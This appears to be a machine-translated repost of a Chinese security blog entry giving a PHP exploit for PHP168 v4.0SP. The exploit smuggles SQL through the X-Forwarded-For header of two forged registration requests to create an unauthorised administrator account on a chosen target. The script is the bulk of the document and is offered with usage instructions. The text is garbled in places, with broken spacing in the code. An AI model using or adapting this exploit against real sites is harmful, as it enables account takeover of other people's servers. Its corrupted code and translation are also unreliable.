佚名MYHACK58:62200819381PHP168 X-Forwarded-For exploit-vulnerability warning-the black bar safety net
amxku’s blog ( http://www.amxku.net/ )
author: amxku
The vulnerability itself is the cause of nothing to say, old X-Forwarded-For problem, I think this loophole a lot of people have found it. Because of this vulnerability for some time, and was just on the pc to test it, may be some error, interested students can their own research.<? php print_r(" +------------------------------------------------------------------+ Create New Admin Exploit For php168 v4. 0SP\n amxku.net +------------------------------------------------------------------+ "); if ($argc<4) { echo "Usage: php ".$ argv[0]." host path uid\n"; echo "host: target server \n"; echo "path: path to php168\n"; echo "uid: the user uid\n"; echo "Example:"; echo "php ".$ argv[0]." www.php168.com / 1 2 3 3 4 5\n"; die; } $host=$argv[1]; $path=$argv[2]; $id=$argv[3]+2; $cmd = "xxxx','0','1 1 1','0','1',", ", '1 2 3', '1 2 3', '1 2 3', '1 2 3', '0', ", '0', ", ", ", "),('".$ id."', '0', '3', ", '1', '0', ", '1', '1', '1', '1', '1', '1', '1', ", ", '1', '1', '1', '1', '0', ", '0', ", ", ", ")/*"; $content_1= "username=amxku&[email protected]&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2"; $content_2= "username=amxku&[email protected]&password=longze&password2=longze&bday_y=&bday_m=&bday_d=&sex=0&oicq=&msn=&homepage=&Submit3=%CC%E1+%BD%BB&step=2"; senddate($content_1); senddate($content_2); function senddate($content){ global $path,$host,$cmd; $data = "POST ".$ path."reg.php"." HTTP/1.1"; $data .= "Accept: */*"; $data .= "Accept-Language: zh-cn"; $data .= "Content-Type: application/x-www-form-urlencoded"; $data .= "User-Agent: Mozilla/4.0"; $data .= "Host: ".$ host.""; $data .= "X-FORWARDED-FOR: ".$ cmd.""; $data .= "Content-length: ". strlen($content).""; $data .= "Connection: Keep-Alive"; $data .= ""; $data .= $content.""; $sendto=fsockopen($host,8 0); if (!$ sendto) { echo 'No response from '.$ host; die; } fputs($sendto,$data); fclose($sendto); }; echo "Create a successful administrator\n amxku.net"; ?>